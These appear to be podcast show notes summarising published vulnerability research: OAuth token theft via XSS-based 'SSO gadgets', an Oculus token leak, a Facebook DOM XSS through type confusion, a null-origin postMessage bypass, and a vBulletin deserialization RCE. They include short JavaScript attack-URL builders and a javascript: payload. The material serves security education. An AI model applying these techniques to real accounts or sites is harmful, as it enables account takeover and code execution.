Show Notes

185 - Facebook Account Takeovers and a vBulletin RCE

A bit of research on leaking access tokens from OAuth2/OIDC flows. In all cases you already need a cross-site scripting vulnerability on the host receiving the callback, but it does present an interesting case of escalating two often-unimportant issues, a self-XSS and a Login CSRF, into an account takeover.

The author presents three cases of “SSO Gadgets”. These are different techniques you may be able to use to capture a usable token. They all make a few assumptions: the attacker must already have an XSS on the host, the victim user must already have authorized the application, and the identity provider must support the prompt=none URL parameter, which tells it to return immediately with the code without needing any user interaction.

Implicit Flow Support - The implicit flow is a weak OAuth2 flow where the access token is returned in the URL and that token can be used immediately against the provider. In this case, an attacker can simply open a new window to the provider, wait for the redirect to happen and read the token from the URL.
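As a rough sketch of the implicit-flow gadget (the endpoint, client_id, and helper names below are illustrative, not from the post), the XSS only needs to build the authorization URL, open it in a popup, and read the token back out of the fragment once the redirect lands on the same origin:

```javascript
// Sketch of the implicit-flow gadget, run from the XSS on the client's origin.
// "https://idp.example/authorize" and the client_id are placeholders.
function buildImplicitAuthUrl(authorizeEndpoint, clientId, redirectUri) {
  const params = new URLSearchParams({
    client_id: clientId,
    redirect_uri: redirectUri,
    response_type: "token", // implicit flow: token comes back in the URL fragment
    prompt: "none",         // no interaction needed if already authorized
  });
  return `${authorizeEndpoint}?${params}`;
}

function extractTokenFromFragment(url) {
  // After the redirect, the access token lives in the fragment, e.g.
  // https://client.example/cb#access_token=abc&token_type=bearer
  const fragment = new URL(url).hash.slice(1);
  return new URLSearchParams(fragment).get("access_token");
}

// In the actual attack the injected script would do something like:
//   const win = window.open(buildImplicitAuthUrl(...));
//   ...then poll win.location.href (readable once it's same-origin again)
//   and pass it to extractTokenFromFragment().
```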

Confidential Client, Using Code Flow with no PKCE - Normally with this flow, the user is redirected back to the host with an authorization code, but unlike the implicit flow the code is not immediately useful. Instead, the server sends the code along with a secret value back to the provider, who then hands over the access token. This way the access token is never exposed to clients. The trick to hijacking the code from these flows is to disrupt that exchange process and prevent the server from actually trying to exchange the code that is sent back.

The author mentioned two tricks that might be useful to do this. One is changing the response_type so the code will no longer be in the expected location; setting it to fragment, for example, will make it invisible to the server side, but it can still be captured by an attacker with an XSS. Another trick would be to provide an invalid state: if the server validates the state before trying to consume the code, it may fail without consuming it. In both cases, the attacker ends up with this “exchange token”. They can then start their own OAuth2/OIDC flow, and swap out their real exchange token for the captured one. The server will then process that stolen token and log the attacker into the victim’s account. There are likely other ways the flow could be broken, but the two mentioned are probably the most common.
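A sketch of the two URL manipulations described above. All endpoint and client values are placeholders, and I've used response_mode=fragment (the standard OAuth2/OIDC knob for moving the response into the fragment) as my reading of the fragment trick:

```javascript
// Two ways to stop the confidential client from consuming the code,
// so it stays usable by the attacker. Values here are illustrative.
function buildBrokenFlowUrl(authorizeEndpoint, clientId, redirectUri, trick) {
  const params = new URLSearchParams({
    client_id: clientId,
    redirect_uri: redirectUri,
    response_type: "code",
    prompt: "none",
  });
  if (trick === "fragment") {
    // Deliver the code in the URL fragment: the server never sees it,
    // but script on the page (the XSS) still can.
    params.set("response_mode", "fragment");
  } else if (trick === "bad-state") {
    // Send a state the server will reject, so it bails out before
    // exchanging the code at the token endpoint.
    params.set("state", "attacker-junk");
  }
  return `${authorizeEndpoint}?${params}`;
}
// The attacker then starts a flow of their own and substitutes the
// captured code for their real one, logging themselves into the victim.
```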

Single-Page Application with Code Flow and PKCE - This one is a bit “meh” to me; an XSS on a single-page application is already basically game over. All they do for this one is simulate the normal flow, since they have all the access from the XSS: compute the code_verifier and code_challenge values, open a new window with the appropriate OAuth code flow URL and the computed values, await the redirect, and obtain the code.

They provide a “real-world” example, though they don’t share any application details. It is an interesting chain, and a nice escalation from normally pretty weak issues.

The first issue in the chain is a Login CSRF, the ability to force another user to log in to an attacker-controlled account. They chain this with a self-XSS in their username. Often this is not seen as a terribly useful chain, since the XSS just provides access to the attacker’s own account even when the victim is the one logged into it, but here they combine it with one of their SSO Gadgets. As the victim still has their own session with the identity provider, the attacker can use an SSO Gadget to steal the victim’s access token through the XSS while the victim is logged into the attacker’s account.

Lastly, they call out that OAuth applications registered with Google as “Web Applications” cannot disable the implicit flow, so that gadget is widely available.

Simple token leakage bug in Oculus endpoints due to the migration from Facebook accounts to Meta accounts. Where the first-party access token was previously difficult to leak because redirects were made through JavaScript, with the new Meta authentication flow redirection was done directly via a URL containing the token. The domain was validated against subdomains of oculus.com, but various subdomains (like forums.oculus.com) would utilize third-party apps. Any open redirect could therefore be utilized to leak the first-party access token and hijack the account.

The open redirect is undisclosed as it’s not fixed as of writing.

DOM-based XSS in Facebook via Instant Games (a newer feature being gradually rolled out). The vulnerability here is in the goURIOnWindow function, which is used for setting the window location and verifying it. What’s strange is this method can take the URI either as a string (in which case it will create an internal URI object instance) or as a URI object directly, which is intended to only be creatable via secure contexts. The problem is, they never actually validate that the incoming object is a real URI object, so an attacker can pass in something like an array to bypass validation.
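The shape of that bug can be sketched generically; the post doesn't show goURIOnWindow's internals, so everything below is an illustrative reconstruction, not Facebook's code:

```javascript
// Reconstruction of the type-confusion: validation only runs on the
// string path, and the "is this actually our URI class?" check is missing.
class URI {
  constructor(str) {
    // stand-in for the real scheme validation
    if (/^javascript:/i.test(str)) throw new Error("blocked scheme");
    this.str = str;
  }
  toString() { return this.str; }
}

function goURIOnWindow(uri, win) {
  if (typeof uri === "string") {
    uri = new URI(uri); // strings get validated on construction...
  }
  // ...but objects are trusted as-is: nothing checks `uri instanceof URI`.
  win.location = uri.toString();
}

// An attacker-controlled array survives untouched: typeof [] is "object",
// so validation is skipped, and Array.prototype.toString yields the payload.
const fakeWindow = { location: null };
goURIOnWindow(["javascript:alert(document.domain)"], fakeWindow);
// fakeWindow.location now holds the javascript: URL, never validated.
```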

This bug is reachable in multiple places, virtually anywhere that uses goURIOnWindow with user-provided input without converting it to a URI object first. The post calls out two modules that could be reached by attackers: useInteractivePluginSDKMessageHandler.react and its openurlasync() method, as well as InstantGamesOpenExternalLinkDialog.react’s showgenericdialogasync method. The former is only reachable in a couple of games. The latter is presumably hittable by more games, but it requires an additional click to exploit since it’s dialog-based.

Meta confirmed this issue was hittable from other places on Facebook that didn’t require user interaction.

A rather simple bug in validating the origin of a Cross-window message due to inappropriately handling null values.

First, let’s talk about the normal flow of things. Some Facebook system embeds third-party applications into its pages. Those third parties can send messages to their parent frame (the Facebook page) to do the OAuth flow for the user. That parent page has an iframe to the “Compat” endpoint which it can communicate with. It is the “Compat” page which actually triggers the OAuth flow and dialog display, using the arbiter endpoint for its redirect_uri. This arbiter endpoint will send the access code back to the “Compat” page, which sends it to whatever Facebook page asked for it, and that page should do any necessary security checks (also doing them before sending the OAuth request to “Compat”).

With the arbiter, if someone could get it to return the access code to them without actually being the “Compat” page or some other trusted location, that would be a vulnerability. Similarly, the “Compat” page only trusts pages on the same origin, and sends back any access codes it receives without any further security. So if one could embed the “Compat” page and pass the checks it performs before accepting communication, they could get an OAuth flow triggered for a first-party application and receive the access token back.

This is where the core issue lies: the “Compat” page attempts to get a URI object for the domain that embedded it, and then compares that with the whitelist. In the following code, this is the URI object for the attacker’s location, and a is the whitelisted URI:

if (this.getProtocol() && this.getProtocol() !== a.getProtocol())
return !1;
if (this.getDomain() && this.getDomain() !== a.getDomain())
return !1;
if (this.getPort() && this.getPort() !== a.getPort())
return !1;
return this.toString() === "" || a.toString() === "" ? !1 : !0

At a glance this code makes sense, but if “Compat” is loaded inside of a sandboxed iframe, the URI object for the attacker’s location will be filled with null values. The way all of these checks are written, null is treated as a success. this.getProtocol() && this.getProtocol() !== a.getProtocol(), for example, never reaches the comparison with the value in a, since it short-circuits when this.getProtocol() resolves to a falsy value.

There is an apparent null check at the end, but .toString() on a null-filled URI object doesn’t result in “” but “null”, again passing the check.
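The bypass can be demonstrated with a small stand-in for that check; isSameUri and makeUri below are a reconstruction of the quoted logic, not Facebook's actual implementation:

```javascript
// Reconstruction of the quoted origin check. When "Compat" sits in a
// sandboxed iframe, the embedder's URI parses to all-null fields.
function makeUri(protocol, domain, port) {
  return {
    getProtocol: () => protocol,
    getDomain: () => domain,
    getPort: () => port,
    // Mirrors the surprising behavior: a null-filled URI stringifies to
    // "null", not "".
    toString: () => (domain === null ? "null" : `${protocol}//${domain}`),
  };
}

function isSameUri(self, a) {
  if (self.getProtocol() && self.getProtocol() !== a.getProtocol()) return false;
  if (self.getDomain() && self.getDomain() !== a.getDomain()) return false;
  if (self.getPort() && self.getPort() !== a.getPort()) return false;
  return self.toString() === "" || a.toString() === "" ? false : true;
}

const sandboxed = makeUri(null, null, null);            // attacker's sandboxed frame
const whitelisted = makeUri("https:", "facebook.com", null);
// Every `self.getX()` is null (falsy), so each comparison short-circuits,
// and toString() yields "null", not "", so the final guard passes too.
console.log(isSameUri(sandboxed, whitelisted));          // true: check bypassed
```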

So any attacker can embed the “Compat” frame inside of a sandboxed iframe, trigger the OAuth flow pretending to be a first-party application, and receive back the access tokens.

The author then goes on to detail more about the actual exploit chain and some other challenges to get around, but I felt this was at least the most interesting and more generic part of the writeup to summarize. Give the rest a read if you’re interested in some Facebook/Meta-specific details.

Simple enough vulnerability: a POST parameter was directly unserialized, which would often be pretty damning, but vBulletin apparently had put in some effort to make it hard to exploit.

There is no universal deserialization gadget for RCE in PHP; each attack is going to depend on the classes the application itself has and whether they do anything sensitive. In vBulletin’s case, they take an extra step and protect many of their classes from being targets by implementing traits that raise exceptions when they are deserialized, severely limiting the targets.

They did find that in the packages path there was a vulnerable class, packages/googlelogin/vendor/monolog, which has a known deserialization gadget. The problem was that despite the code existing, it wasn’t included on the page, so the necessary classes could not be deserialized.

To get around this they abuse vBulletin’s class autoloader. If you’re unfamiliar with autoloading in PHP: you can provide a function to PHP that is called whenever it tries to create a class it doesn’t know about, giving that function a chance to include any files that might be necessary. The authors here were able to abuse vBulletin’s autoloader by first trying to deserialize the googlelogin_vendor_autoload class, which the autoloader would see and then load the packages/googlelogin/vendor/autoload.php file. That would include the needed monolog files, allowing the known deserialization gadget to be used.

Autoloading is a weird feature in PHP: really powerful, and used somewhat silently because it makes developers’ lives easier, but as seen here it can be a useful gadget in an exploit chain.